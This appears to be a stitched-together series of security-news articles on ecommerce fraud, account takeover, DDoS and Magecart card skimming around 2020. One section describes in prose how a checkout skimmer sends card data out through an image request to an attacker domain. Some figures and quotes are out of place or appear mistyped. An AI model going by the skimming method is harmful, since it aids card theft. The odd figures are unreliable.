Attempted account takeover (ATO) attacks swelled 282 percent between Q2 2019 to Q2 2020, Sift reveals. Likewise, ATO rates for physical ecommerce businesses — those that sell physical goods online —jumped 378 percent since the start of the COVID-19 pandemic, indicating that fraudsters are leaning heavily on this attack vector in order to steal payment information and rewards points stored in online accounts on merchant websites.
According to Deloitte, ecommerce sales are forecasted to grow 25-35 percent and are expected to generate $182 billion and $196 billion this season.
When combined with the surge in ATO rates, the 2020 holiday shopping season presents the perfect opportunity for fraudsters to leverage account takeovers to take advantage of more people shopping online. This can have a devastating impact on companies including financial repercussions and brand abandonment.
Account hacking leads to brand abandonment
According to the research, ATO attacks also create significant and lasting brand damage. Based on a survey of 1,000 U.S. adult consumers, 28 percent of respondents would completely stop using a site or service if their accounts on that site were hacked.
And while consumers can secure their accounts by leveraging tools like password managers, multi-factor authentication (MFA), and by using unique passwords, they largely ignore these best practices. In fact, 66 percent of consumers surveyed either don’t use any type of password manager or aren’t sure if they do, despite 52 percent of them having concerns about becoming victims of ATO in the future, and 25 percent reporting that they have already had their accounts hacked at least once before.
- Attacks are fueled by automation: Between Q2 2019 and Q2 2020, ATO attacks happened in discrete waves about a week apart, indicating that fraudsters are turning to bots and automation in order to overwhelm trust & safety teams.
- Fraudsters sneak in and cash out: Of those who have experienced ATO, 41 percent of respondents reported that payment details were stolen and used to make purchases, and 37 percent of victims had money taken directly from their accounts. Another 37 percent had rewards points or credits taken and used to buy goods and services.
- Ecommerce is in the crosshairs: Of consumers who confirmed being victims of ATO attacks, a whopping 61 percent said their ecommerce (both physical and digital goods and services) accounts were hacked.
- Other online destinations on which consumers reported experiencing ATO include:
- Social media sites: 36 percent
- Financial services sites: 35 percent
- Online dating sites: 22 percent
- Travel sites: 19 percent
ATO attacks for financial gain
Like payment fraud and content abuse—two of the other links in the fraud supply chain – account takeover is typically a means to a financial end.
Using credentials either illicitly purchased on the dark web or obtained through techniques like credential stuffing, hackers gain access to user accounts on a business’s website and then make purchases on that website using stored payment information or rewards points. Attackers may also export the stored information in order to commit fraud across the web.
While consumers may be the immediate victim of these attacks, businesses ultimately face the real costs: in addition to reimbursing hacked customers, businesses face exorbitant chargeback fees and payment network fines when ATO leads to payment fraud.
Customer security as customer experience
“The surge in ATO attacks indicates that merchants can’t leave the burden of account security to their customers. Rather, companies should treat account protection as part of the overall customer experience and as a key part of their Digital Trust & Safety strategy, which allows for seamless transactions while preventing fraud.”
Forter released its Fraud Attack Index, delivering in-depth insight into the impact of COVID-19 on online buyer behavior and ecommerce fraud trends.
This edition revealed that:
- New customer accounts now represent 30% of transactions, five times more than they did pre-COVID-19. This is good news for retailers, but merchants using legacy fraud prevention systems could miss out on some of this revenue potential due to high false decline rates. Legacy systems lack data on new customers and cannot accurately distinguish between legitimate consumers and fraudsters.
- The growth in transactions driven by the consumer shift from brick-and-mortar stores to online purchasing is masking the fact that the number of fraud attacks has risen in real terms, leading retailers into a false sense of security.
- Omnichannel fraud is growing: Buy Online, Pick-up In Store (BOPIS) fraud rose 55% as new customer service options are subjected to significant fraud.
- With transactions falling by 97% compared with H1 2019, fraud attack rates in the travel industry more than doubled, with hotel fraud attacks rising 139% and airline fraud attacks increasing 144%.
- Account takeover (ATO) and Policy Abuse such as returns abuse, promotion abuse, and reseller abuse are set to surge during the holiday season.
Michael Reitblat, CEO of Forter, comments: “A rapid rise in new customer accounts, coupled with having to pivot quickly from brick-and-mortar to online sales channels, put unprecedented stress on merchants as they tried to perfect the ecommerce experience.
“It is clear from what we’ve seen that some retailers were more agile and prepared for this than others, quickly introducing new services such as curbside pickup and Buy Online, Pick-up In-Store, in a bid to retain new customers.
“To fully realize this new revenue potential, merchants need more accurate fraud prevention that can distinguish between these valuable new customers and fraudsters. Merchants can have a false decline rate between 5-7x higher for new customers – typical of legacy systems that do not have sufficient data on new account holders.”
Growth in transaction volumes masks increasing fraud attack numbers
There have been dramatic increases in transaction volumes across the majority of vertical sectors, but particularly those traditionally served by brick-and-mortar stores. Volumes rose 172% in home, furnishings and garden, 93% in food delivery & beverage and 119% in groceries.
Ecommerce fraud attacks decreased as a percentage of all transactions but in real terms, the number of fraud attacks has risen. This represents significant losses for retailers at a critical time.
Holiday season fraud surge expected
As retailers prepare for a critical holiday season and aim to recoup some of the year’s earlier losses, the research indicates that ATO attacks, and returns and delivery fraud will surge as fraudsters seek to exploit the increase in online shopping.
At the same time, customers will be more likely to take unfair advantage of promotions and abuse delivery and returns policies. Fraud and abuse trends that retailers need to prepare for include:
- Account takeover fraud to dramatically increase: The analysis indicates that fraudsters will seek to operationalize the data they’ve stolen and collected through data breaches and social engineering scams conducted during COVID-19 disruption. Also, new customer accounts opened by less experienced users are likely to use weaker passwords, fewer security steps, and be more vulnerable to ATO. As a result, retailers need to prepare for increasing ATO attacks during the holiday season.
- Returns and delivery fraud will continue to rise: Retailers increasingly offered omnichannel customer service options such as Buy Online, Return in Store (BORIS) and BOPIS, to satisfy new customers during COVID-19. Fraud attacks exploiting BOPIS policies increased 55% compared to H1 2019, as merchants offering frictionless experiences are less likely to ask for customer identification. It is anticipated that fraudsters will increasingly target and exploit returns and delivery services as online shopping surges over the holiday season.
- Policy abuse set to spike: Merchants courting new customers with aggressive promotions and user-friendly omnichannel options, will expose themselves to greater abuse risk, including returns, promotion and reseller abuse.
Vikrant Gandhi, Senior Industry Director at Frost & Sullivan commented: “Fraud and policy abuse issues have magnified in the recent months in the global ecommerce industry. Our research indicates a rise in sophisticated fraud attempts, including promotions abuse by using synthetic identities and friendly fraud in 2020.
“The challenge for merchants is to deliver frictionless customer experiences without letting fraud prevention come in their way of doing so. Our recommendation to merchants is if they do not prioritize working with identity-based, integrated fraud prevention platforms that leverage behavioral analytics, machine learning and the power of big data that is informed and refined by highly trained analysts, they will never be able to stay ahead of fraudsters and policy abusers.”
Attackers focused on COVID-era lifelines such as healthcare, e-commerce, and educational services with complex, high-throughput attacks designed to overwhelm and quickly take them down, Netscout reveals.
“The first half of 2020 witnessed a radical change in DDoS attack methodology to shorter, faster, harder-hitting complex multi-vector attacks that we expect to continue,” stated Richard Hummel, threat intelligence lead, Netscout.
“Adversaries increased attacks against online platforms and services crucial in an increasingly digital world, such as e-commerce, education, financial services, and healthcare. No matter the target, adversary, or tactic used, it remains imperative that defenders and security professionals remain vigilant in these challenging days to protect the critical infrastructure that connects and enables the modern world.”
Record-breaking DDoS attacks at online platforms and services
More than 929,000 DDoS attacks occurred in May, representing the single largest number of attacks ever seen in a month. 4.83 million DDoS attacks occurred in the first half of 2020, a 15% increase. However, DDoS attack frequency jumped 25% during peak pandemic lockdown months (March through June).
Bad actors focused on shorter, more complex attacks
Super-sized 15-plus vector attacks increased 2,851% since 2017, while the average attack duration dropped 51% from the same period last year. Moreover, single-vector attacks fell 43% while attack throughput increased 31%, topping out at 407 Mpps.
The increase in attack complexity and speed, coupled with the decrease in duration, gives security teams less time to defend their organizations from increasingly sophisticated attacks.
Organizations and individuals bear the cost of cyber attacks
To determine the impact that DDoS attacks have on global Internet traffic, the Netscout ATLAS Security Engineering and Response Team (ASERT) developed the DDoS Attack Coefficient (DAC). It represents the amount of DDoS attack traffic traversing the internet in a given region or country during any one-minute period.
If no traffic can be attributed to DDoS, the amount would be zero. DAC identified top regional throughput of 877 Mpps in the Asia Pacific region, and top bandwidth of 2.8 Tbps in EMEA. DAC is important since cybercriminals don’t pay for bandwidth. It demonstrates the “DDoS tax” that every internet-connected organization and individual pays.
A LexisNexis Risk Solutions report tracks global cybercrime activity from January 2020 through June 2020. The period has seen strong transaction volume growth compared to 2019 but an overall decline in global attack volume. This is likely linked to growth in genuine customer activity due to changing consumer habits.
The period has seen strong transaction volume growth compared to 2019 but an overall decline in global attack volume. This is likely linked to growth in genuine customer activity due to changing consumer habits.
The report analyzes data from more than 22.5 billion transactions processed, a 37% growth year over year. Mobile device transactions also continue to rise, with 66% of all transactions coming from mobile devices in the first half of 2020, up from 20% in early 2015.
There’s also an uptick in transactions from new devices and new digital identities. This is attributed to many new-to-digital consumers moving online to procure goods and services that were no longer available in person or harder to access via a physical store, during the pandemic.
Attacks by region
The EMEA region saw lower overall attack rates in comparison to most other global regions from January through June 2020. This is due to a high volume of trusted login transactions across relatively mature mobile apps.
The attack patterns in EMEA were also more benign and had less volatility and fewer spikes in attack rates. However, there are some notable exceptions. Desktop transactions conducted from EMEA had a higher attack rate than the global average and automated bot attack volume grew 45% year over year.
The UK originates the highest volume of human-initiated cyberattacks in EMEA, with Germany and France second and third in the region. The UK is also the second largest contributor to global bot attacks behind the U.S.
One example of a UK banking fraud network saw more than $17 million exposed to fraud across 10 financial services organizations. This network alone consisted of 7,800 devices, 5,200 email addresses and 1,000 telephone numbers.
Decline in attack rate
The overall human-initiated attack rate fell through the first half of 2020, showing a 33% decline year over year. The breakdown by sector shows a 23% decline in financial services and a 55% decline in e-commerce attack rates.
Latin America experienced the highest attack rates of all regions globally and realized consistent growth in attack rates from March to June 2020. The attack patterns in North America and EMEA had less volatility and fewer spikes in attack rates from the six-month period observed.
Attack vector global view
Media is the only industry that recorded an overall year over year growth in human-initiated cyberattacks. There was a 3% increase solely across mobile browser transactions.
Globally, automated bots remain a key attack vector in the Digital Identity Network. Financial services organizations experienced a surge in automated bot attacks and continue to experience more bot attacks than any other industry.
Across the customer journey
New account creations see attacks at a higher rate than any other transaction type in the online customer journey. However, the largest volume of attacks targets online payments. Login transactions have seen the biggest drop in attack rate in comparison to other use cases.
Analysis across new customer touchpoints in the online journey is included in this report for the first time, providing additional context on key points of risk such as money transfers and password resets.
All industries have felt the impact of COVID-19. There are clear peaks and troughs in transaction volumes coinciding with global lockdown periods.
Financial services organizations realized a growth in new-to-digital banking users, a changing geographical footprint from previously well-traveled consumers and a reduction in the number of devices used per customer. There have also been several attacks targeting banks offering COVID-19-related loans.
E-commerce merchants have seen an increase in digital payments and several other key attack typologies that coincide with the lockdown period. These included account takeover attacks using identity spoofing and more first-party chargeback fraud.
Rebekah Moody, director of fraud and identity at LexisNexis Risk Solutions, said: “The move to digital, for both businesses and consumers, has been significant. Yet with this change comes opportunity for exploitation. Fraudsters look for easy targets: whether government support packages, new lines of credit or media companies with fewer barriers to entry.”
Many businesses are at risk from bot attacks, despite an awareness of the problem and a widely held belief that they have the problem under control, Netacea reveals.
Global businesses at risk from bot attacks
The research surveyed businesses across the travel, entertainment, e-commerce and financial services sectors. It found a high awareness of how bot attacks could negatively affect a business, with over 70% understanding the most common attacks, including credential stuffing and card cracking, and 76% stating they have been attacked by bots.
However, these same businesses revealed that around 15% of their web application resources are taken up by bots. With over half of web traffic today generated by bots, this implies that businesses are unaware of a great deal of the bot traffic on their sites.
Businesses were also wholly unaware of the marketplaces where their customers’ usernames and passwords can be bought and sold, with only 1% of respondents being familiar with them.
Entertainment sites most confident
Online entertainment sites, including gaming and streaming, were the most confident in their association of a bot attack with an incident, with over half claiming not to have been attacked in the last year.
Just over 20% of e-commerce sites claimed to not have been affected, while financial services and travel sites were the most aware of the ubiquity of attacks—fewer than 5% said that they had not been the victim of an attack.
Lack of visibility may be down to a lack of responsibility
This lack of visibility may be down to a lack of responsibility: only one in ten businesses say that bot mitigation is the responsibility of a single department or person. Almost two thirds say it is the responsibility of four or more departments, making passing the problem along—or even ignoring it completely—much more of a possibility.
“Current circumstances mean that businesses are relying on their online presence more than ever before,” said Andy Still, CTO, Netacea. “This also means more opportunities for online criminal enterprises looking to increase their profits. And while the majority of businesses are not oblivious to the problem of bot attacks, the inevitable conclusion of this research is that this awareness is not leading to action.”
“High profile attacks, such as ransomware that locks down sites completely, have dominated the headlines recently, which may have led to this complacency. Bot attacks, while more subtle, can be just as devastating to a business, as accounts are stolen and sold on, card fees become crippling, and bad decisions are made on the basis of faulty data,” cautioned Still.
The research did reveal some good news—nearly all businesses were either investing in, or planning to invest in bot management, and almost none were cutting back on this vital security measure.
Your payment card information got stolen but you don’t know how, when and where? Maybe you shopped on one of the 570 webshops compromised by the Keeper Magecart group (aka Magecart Group 8) since April 1, 2017.
Magecart Group 8’s modus operandi and targets
The list of the online shops hit by the criminals has been released by researchers from Gemini Advisory, who managed to compile it after gaining access to the group’s dedicated attack server that hosts both the malicious payload and the exfiltrated data stolen from victim sites.
“Analysis revealed that the Keeper group includes an interconnected network of 64 attacker domains used to deliver malicious JS payloads and 73 exfiltration domains used to receive stolen payment cards data from victim domains.
Their research also revealed that:
- Over 85% of the victim sites operated on the Magento CMS, 5% WordPress, and 4% Sophify
- The group tried to disguise its malicious attacker domains as legitimate services (e.g., the attacker domain closetlondon[.]org attempted to imitate closetlondon.com) and tried to imitate popular website plugins and payment gateways
- The majority of victim e-commerce sites was hosted in the U.S., followed by the U.K., the Netherlands, France, India, etc.
“The 570 victim e-commerce sites were made up of small to medium-sized merchants and were scattered across 55 different countries,” the researchers shared.
“Victims with the top Alexa Global Ranking received anywhere from 500,000 to over one million visitors each month and were responsible for selling electronics, clothing, jewelry, custom promotional products, and liquor.”
The attackers likely targeted small and medium-sized retailers because they are less likely to have a dedicated IT security team, to implement CMS and plugin patches promptly, and to have security measures in place and attack detection capabilities.
The profitability of Magecart attacks
The researchers estimated that the group may have generated over $7 million USD from selling compromised payment cards between 2017 and today.
“With revenue likely exceeding $7 million and increased cybercriminal interest in CNP [Card Not Present] data during the COVID-19 quarantine measures across the world, this group’s market niche appears to be secure and profitable,” they noted, and said that they expect the group to continue launching increasingly sophisticated attacks against online merchants across the world.
For the end users – i.e., the online shoppers – it’s all the same and, unfortunately, there is little they can do to protect themselves against the threat of getting their payment card info skimmed.
Magento 1 reaches EOL: Merchants urged to upgrade or risk breaches, falling out of PCI DSS compliance
When Adobe released security updates for Magento last week, it warned that the Magento 1.x branch is reaching end-of-life (EOL) and support (EOS) on June 30, 2020, and that those were the final security patches available for Magento Commerce 1.14 and Magento Open Source 1.
Unfortunately, there are still too many (over 100,000) active Magento 1.x installations. The company is urging their owners and admins to migrate to Magento 2.x or risk being hit once another critical and easily exploited vulnerability is unearthed and its existence made public.
Magento is a very popular open-source e-commerce platform that powers many online shops, a fact that hasn’t gone unnoticed by cyber criminals.
Nearly four years ago (and possibly even earlier), cyber crooks started concentrating on breaching Magento-based shops and injecting them with scripts that quietly grabbed users’ personal and payment card data information and sent it to a server they controlled.
Since then, the tactic has been used and continues to be used by many cyber criminal groups, which have been classified by security companies as “Magecart” attackers. As they are quick to exploit newfound vulnerabilities in the Magento core and third-party extensions, hardly a day passes without news about another online shop having been compromised.
If you decide to stick with Magento 1
“If you have a store that continues to run on Magento 1 after June 30, please be aware that from that date forward you have increased responsibility for maintaining your site’s security and PCI DSS compliance,” Adobe warned.
Merchants that continue to use an unsupported Magento 1 version will have to implement compensating controls to re-certify PCI DSS compliance, such as signing up for and implementing third-party fixes and updates, continuously scanning their installations for malware, vulnerabilities and unauthorized accounts, using a web application firewall, and so on.
“General security vulnerabilities tend to increase the longer software is unsupported as hackers continue to use new technologies and techniques for exploitation. This raises the risk of attacks and security breaches over time and increases the possibility of exposing personally-identifiable customer data,” Adobe explained.
Companies risk their reputation, the trust of their customers, fines and may even lose their credit card processing ability if they fail to protect user information.
Another thing: the end of support for Magento 1 also means that some extensions merchants use will not be available anymore.
“We encourage Magento 1 merchants to download the Magento 1 extensions they plan to keep, since Magento 1 extensions will not be available in the Magento Marketplace after July 7, 2020, and will be removed from the Magento repository after August 6, 2020,” Adobe noted last week.
Magento 2 or something else?
PayPal, Visa and other payment processing companies and payment platforms have also been urging merchants to make the switch to Magento 2.
Even though Magento 2 was released five years ago and even though the migration from Magento 1 to Magento 2 can be performed by using an official Data Migration Tool the number of Magento 2 installations is still lagging (it’s currently around 37,500 installations).
As “painful” and costly as it maybe, this EOL will hopefully push many of them to finally make the switch – or make the switch to an alternative platform.
“2020 has been a tumultuous year for retailers. Merchants should not have to worry about security issues or upgrading their ecommerce platform while they are in the middle of adapting to drastically changed consumer behaviors and expectations. Amidst the list of business-critical priorities a merchant needs to focus on, worrying about what’s happening with a Magento migration or installation should not be included,” noted Jimmy Duvall, Chief Product Officer at BigCommerce.
Many people are using COVID-19 quarantine to get projects done at home, meaning plenty of online shopping for tools and supplies. But do you buy blind? Research shows 97% of consumers consult product reviews before making a purchase.
Fake reviews are a significant threat for online review portals and product search engines given the potential for damage to consumer trust. Little is known about what review portals should do with fraudulent reviews after detecting them.
A research looks at how consumers respond to potentially fraudulent reviews and how review portals can leverage this information to design better fraud management policies.
“We find consumers have more trust in the information provided by review portals that display fraudulent reviews alongside nonfraudulent reviews, as opposed to the common practice of censoring suspected fraudulent reviews,” said Beibei Li of Carnegie Mellon University.
“The impact of fraudulent reviews on consumers’ decision-making process increases with the uncertainty in the initial evaluation of product quality.”
Fake reviews aid decision making
A study conducted by Li alongside Michael Smith, also of Carnegie Mellon University, and Uttara Ananthakrishnan of the University of Washington, says consumers do not effectively process the content of fraudulent reviews, whether it’s positive or negative. This result makes the case for incorporating fraudulent reviews and doing it in the form of a score to aid consumers’ decision making.
Fraudulent reviews occur when businesses artificially inflate ratings of their own products or artificially lower the ratings of a competitor’s product by generating fake reviews, either directly or through paid third parties.
“The growing interest in online product reviews for legitimate promotion has been accompanied by an increase in fraudulent reviews,” continued Li. “Research shows about 15%-30% of all online reviews are estimated to be fraudulent by various media and industry reports.”
Platforms don’t have a common way to handle fraudulent reviews. Some delete fraudulent reviews (Google), some publicly acknowledge censoring fake reviews (Amazon), while other portals, such as Yelp, go one step further by making the fraudulent reviews visible to the public with a notation that it is potentially fraudulent.
This study used large-scale data from Yelp to conduct experiments to measure trust and found 80% of the users in our survey agree they trust a review platform more if it displays fake review information because businesses are less likely to write fraud reviews on these platforms.
Transparency over censorship
Meanwhile, 85% of users in our survey believe they should have a choice in viewing truthful and fraudulent information and the platforms should leave the choice to consumers to decide whether they use fraudulent review information in determining the quality of a business.
The study also finds that consumers tend to trust the information provided by platforms more when the platform distinguished and displayed fraudulent reviews from nonfraudulent reviews, as compared to the more common practice of censoring suspected fraudulent reviews.
“Our results highlight the importance of transparency over censorship and may have implications for public policy. Just as there are strong incentives to fraudulently manipulate consumer beliefs pertaining to commerce, there are also strong incentives to fraudulently manipulate individual beliefs pertaining to public policy decisions,” concluded Li.
When this fraudulent activity information is made available to all consumers, platforms can effectively embed a built-in penalty for businesses that are caught writing fake reviews.
A platform may admit to users that there is fraud on its site, but that is balanced by an increase in trust from consumers who already suspected that some reviews may be fraudulent and now see that something is being done to address it.
Magecart attackers have compromised web shops belonging to large retail chains Claire’s and Intersport and equipped them with payment card skimmers.
The compromise of Claire’s online store and that of its sister brand Icing has been flagged by Sansec researchers.
The skimmer was served from a domain made to look like it might belong to the company (claires-assets.com), and it was added to the two online stores between April 25th and 30th.
“The malware was added to the (otherwise legitimate) app.min.js file. This file is hosted on the store servers, so there is no “Supply Chain Attack” involved, and attackers have actually gained write access to the store code,” the researchers pointed out.
“The skimmer attaches to the submit button of the checkout form. Upon clicking, the full ‘Demandware Checkout Form’ is grabbed, serialized and base64 encoded. A temporary image is added to the DOM with the __preloader identifier. The image is located on the server as controlled by the attacker. Because all of the customer submitted data is appended to the image address, the attacker now has received the full payload. Immediately, the image element is removed.”
How the attackers managed to compromise the web shops is still unknown, but they started planning the attack a month before actually executing it. In fact, they registered the malicious domain a day after Claire’s announced that they will be temporarily close all of their brick and mortar stores due to COVID-19.
ESET researchers have pointed out the compromise of Intersport’s web store and said that the company fixed the issue within several hours of ESET letting them know.
Sansec researchers say that an initial hack happened on Apr 30th and then another one on May 14th:
Intersport stores got hacked on Apr 30th, cleaned on May 3rd, then hacked again on May 14th. pic.twitter.com/RabcjPzzWd
— Sansec (@sansecio) June 15, 2020
Only the localized Intersport web shops serving customers from the Balkans region have been compromised.
It is still unknown how long the skimmers went unnoticed.
None of the compromised web shops sport a prominent notification about the breach and payment card info theft. Claire’s notified the payment card networks and law enforcement, and let’s hope they will contact affected customers directly once they determine the extent of the compromise and theft.
Companies should have protections in place to notice this and other types of breaches soon after they happen, but unfortunately many don’t.
If you’re paying for your purchases with payment cards – whether online or in physical stores – you should regularly check your account statements for unauthorized charges and report them quickly.
Trust has eroded among criminal interactions, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, Trend Micro reveals.
Popular underground goods and services
The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness.
Trends for cybercrime products and services
The report also illustrates the changing market trends for cybercrime products and services since 2015. Commoditization has driven prices down for many items. For example, crypting services fell from $1,000 to just $20 per month, while the price of generic botnets dropped from $200 to $5 per day.
Pricing for other items, including ransomware, Remote Access Trojans (RATs), online account credentials and spam services, remained stable, which indicates continued demand.
However, there has been a high demand for other services, such as IoT botnets, with new undetected malware variants selling for as much as $5,000. Also popular are fake news and cyber-propaganda services, with voter databases selling for hundreds of dollars, and gaming accounts for games like Fortnite can fetch around $1,000 on average.
Other underground market trends
Other notable findings include the emergence of markets for:
- Deepfake services for sextortion or to bypass photo verification requirements on some sites.
- AI-based gambling bots designed to predict dice roll patterns and crack complex Roblox CAPTCHA.
- Access-as-a-Service to hacked devices and corporate networks. Prices for Fortune 500 companies can reach up to US$10,000 and some services include access with read and write privileges.
- Wearable device accounts where access could enable cybercriminals to run warranty scams by requesting replacement devices.
Underground market trends will likely shift further in the months following the global COVID-19 pandemic, as attack opportunities continue to evolve. To protect against the ever-changing threat landscape, it is recommended to implement a multi-layered defense approach to protect against the latest threats and mitigate corporate security risk.
Account Takeover (ATO) attacks happen when a bad actor gains access to a legitimate customer’s eCommerce store account and uses that account for fraud.
The impact of ATO attacks
A new Riskified survey shows that ATO attacks have a huge negative impact on customers and merchants, damaging brand reputation and hurting merchants’ bottom lines. Despite that, many merchants lack security measures, and 35% of merchants report that at least 10% of their accounts have been taken over in the last 12 months.
Both merchants and customers value secure store accounts. Customers cite their convenience and the opportunity to earn rewards as notable benefits. Merchants report that account holders shop more often and spend more per purchase than other customers.
But accounts can also increase risk if they are not properly secured. Sixty-six percent of merchants and 69% of customers say they are concerned about their accounts getting hacked. Purchases made using compromised store accounts are hard for merchants to detect, because they look like they are made by legitimate returning customers.
ATO attacks are also very costly for merchants. When fraudsters use compromised accounts to make fraudulent purchases, not only does the merchant lose the revenue and the value of the goods sold, but it also often suffers serious damage to its brand reputation and diminished customer lifetime value.
65% of customers say they would likely stop buying from a merchant if their account was compromised. 54% of customers say they would delete their account, 39% would go to a competitor, and 30% say they would tell their friends to stop shopping with the merchant.
Preventing ATOs presents unique challenges
Because ATOs require only a login and stolen password, merchants have less data with which to evaluate the action, making detection and prevention difficult. Many merchants are failing to do so:
- 27% admit that they do not have measures in place to prevent ATOs.
- 24% of merchants can’t identify an ATO during a purchase.
- 14% of merchants say they are not even aware that an ATO has occurred unless a customer contacts them.
- Only 7.5% of customers learn their accounts were compromised from the merchant. The vast majority spot changes to their accounts or learn of unauthorized purchases.
Merchants that take steps to reduce ATOs risk hurting the customer experience. The most common approach to prevent ATOs is two-factor authentication for login attempts (62%), which can frustrate legitimate customers and increase cart abandonment.
Many merchants also require complex passwords to increase security, with 73% reporting that account passwords must contain a mix of characters, numbers, symbols and uppercase and lowercase letters.
This can help security, but it also increases friction and does little for customers who reuse passwords, meaning that store accounts are at risk through data breaches on other sites. That’s a real concern, as 47% of customers admit to using the same password for two or more online stores.
Embracing advanced technology may offer a solution
Because of their potential for serious financial and reputational harm – combined with the difficulty in detection – merchants need to use as much available data as possible to avoid ATOs. For example, merchants should look at the device and network details, proxy usage and previous logins to determine if the entity attempting to access the account is the rightful owner.
If the device or network is unfamiliar or exhibiting characteristics consistent with fraudsters, merchants should exercise caution by notifying the account owner or applying two-factor authentication.
Merchants also need to recognize that the account takeover isn’t the end goal. Fraudsters use ATO attacks to then place fraudulent orders, and merchants have the advantage of seeing that whole process.
An unfamiliar login or a change of details might seem suspicious initially, but if the cart that reaches checkout is low risk, then merchants can likely safely approve the order.
Similarly, if a safe-looking account event is followed by a chargeback, then merchants should take another look at the account activity and, likely, prompt the customer to change their password. When merchants ensure that these parts of the shopping journey – and the teams and solutions that manage them – are coordinated, they can decrease risk and increase revenue.
“Our survey shows that merchants are aware of and concerned with ATO attacks, but they usually lack the ability to identify and prevent them,” said Assaf Feldman, CTO at Riskified.
“Without a dynamic approach that evaluates all relevant data, merchants risk significant financial losses, frustrated customers and damaged brand reputations. Advanced machine-learning solutions can instantly recognize legitimate customers and ease their path to checkout.
“Suspicious actions can be verified or blocked to minimize damage. By doing so, merchants maximize revenue while giving their customers a great experience.”
The importance of accounts
Accounts are an important shopping tool for customers:
- 3% of customers say they have accounts on individual sites for shopping.
- 75% do most or all of their online shopping with merchants where they have accounts.
- 42% said they shop more frequently when they have an account.
Merchants get a significant portion of their business from customers with accounts:
- More than 67% of the merchants surveyed say at least half of their orders come from customers with accounts.
- 58% of merchants report that account holders spend more per purchase than customers who use guest checkout.
- 61% say that account holders purchase more frequently than customers who use guest checkout.
“Companies can combat lateral phishing threats by adopting advanced security solutions that identify suspicious logins and take actions before breaches can occur. These controls enable businesses to verify users’ identities and enforce measures, such as MFA, which can limit an attacker’s chance of hijacking a corporate email address in the first place. Additionally, all companies can learn that it is essential to have full visibility and control over their customer data in order to prevent a breach. To do so, organizations must implement security solutions that remediate misconfigurations, enforce real-time access control, encrypt sensitive data at rest, manage the sharing of data with external parties, and prevent the leakage of sensitive information,” said Anurag Kahol, CTO at Bitglass.
The COVID-19 crisis is driving the global growth of e-commerce sales, with millions of consumers worldwide in quarantine shopping for goods, services and entertainment online.
Transaction volumes in most retail sectors have seen a 74 percent rise in March compared to the same period last year, while online gaming has seen a staggering increase of 97 percent, according to analysis by ACI Worldwide of hundreds of millions of transactions from global online retailers.
“During these unprecedented and uncertain times with millions now at home, many consumers are going online to purchase products or services,” said Debbie Guerra, executive vice president, ACI Worldwide.
“Quarantine has changed lives for all of us, with consumers buying electronics and furniture—to support work, communication, school and entertainment—as well as items such as home goods and DIY products.”
However, fraud is on the increase too, the research shows, as fraudsters are using the surge in online activity to target unsuspecting consumers and merchants.
Merchants are starting to experience dramatic increases in COVID-19-related phishing activities, with stolen credentials released into the e-commerce payments chain, as well as increased friendly fraud activities.
“Fraudulent attempts are on the rise, and consumers must be vigilant as fraudsters are using the current situation to obtain and use their financial data and information,” continued Guerra.
Online retailer sectors with rising transaction volumes in March 2020 compared to the previous year include:
- Home products and furnishings: +97 percent, DIY products: +136 percent, Garden essentials: +163 percent, Electronics: +26.6 percent, Telco: +18.6 percent
Online retail sectors with declining transaction volumes in the same period:
- Ticketing: -60 percent, Travel: -44 percent, Online dating: -8.9 percent
- Average fraudulent attempted purchase value increased by $36 in March, driven by electronic and retail goods; this corresponds to a fraudulent attempted transactional value increase by 13 percent.
- Fraudulent attempted transactional volume decreased by 8 percent, driven by increase of fraudulent attempt purchase value.
“Long term, we and others in the industry predict that the shift in consumer behavior—opting for online purchases—is likely to outlast the crisis,” concluded Guerra.
“The industry is well ahead of the curve in adapting payment methods and ways to combat fraud in response to the changing behaviors and expectations of consumers, which are now being expedited by the lockdown.”
Tips for consumers to protect identity and personal information
- Beware of online requests for personal information. Coronavirus-themed emails seeking personal information are likely to be phishing scams. Legitimate government agencies won’t ask for that information. Delete the email.
- Check the email address or link. Inspect a link by hovering the mouse button over the URL to see where it leads. Sometimes, it’s obvious the web address is not legitimate. But keep in mind phishers can create links that closely resemble legitimate addresses. Delete the email.
- Watch for spelling and grammatical mistakes. If an email includes spelling, punctuation and grammar errors, it’s likely a sign of a phishing email. Delete the email.
- Look for generic greetings. Phishing emails are unlikely to use a person’s name. Greetings like “Dear sir or madam” often signal an email is not legitimate.
- Avoid emails that insist acting now. Phishing emails often try to create a sense of urgency or demand immediate action. Delete the email.
Tips for merchants to maintain security and deliver to customers
Maintain security and deliver a great customer experience, as consumer purchasing behavior—both genuine and fraudulent—has changed.
- For example: Express shipment and Buy-Online Pickup In-Store delivery methods in the last two weeks have tripled, making transaction decision speed and accuracy critical.
- Use customer profiling and time-on-file techniques to maintain the customer experience for valued customers and ensure good transactions are still accepted.
Expect an increase in friendly fraud chargebacks as a result of growing financial difficulties among consumers. Friendly fraud occurs when a cardholder receives goods, but denies making a purchase, or a family member makes a purchase without cardholder approval.
- Monitor systems and update as necessary. Business intelligence tools and real-time monitoring lead to immediate decisions and responses. Employ rapid access to fraud intelligence to inform rules changes in real time.
- Engage frequently with web and mobile site security management. Give these teams the tools, techniques and procedures to detect, contain and mitigate botnets. And considering the presence of both good and bad bots, put business policies in place to address this issue with clarity for both teams.
There has been a spike in digital commerce since social distancing became widespread globally, according to a TransUnion research.
The research found a 23% increase in global e-commerce transactions in the week following the World Health Organization declaring the novel coronavirus outbreak a pandemic on March 11th compared to the average weekly volume in 2020.
“It is clear that social distancing has changed consumer shopping behaviors globally and will continue to do so for the foreseeable future,” said Greg Pierson, senior vice president of business planning and development at TransUnion. “No doubt fraudsters will continue to follow the trends of good consumers and adjust their schemes accordingly.”
Increase in account takeover
In a recent survey of 1068 Americans 18 and older, 22% said they have been targeted by digital fraud related to COVID-19. The survey reported a 347% increase in account takeover and 391% rise in shipping fraud attempts globally against its online retail customers from 2018 to 2019.
“With so many reported data breaches, it’s not just about if your account will be hijacked, it’s about when,” said Melissa Gaddis, senior director of customer success for TransUnion Fraud & Identity Solutions.
“Once a fraudster breaks into an account, they have access to everything imaginable resulting in stolen credit card numbers and reward points, fraudulent purchases, and redirecting shipments to other addresses.”
E-commerce fraud and transaction methods
Typical methods used to take over an account include buying login details on the dark web, credential stuffing, hacking, phishing, romance scams and social engineering.
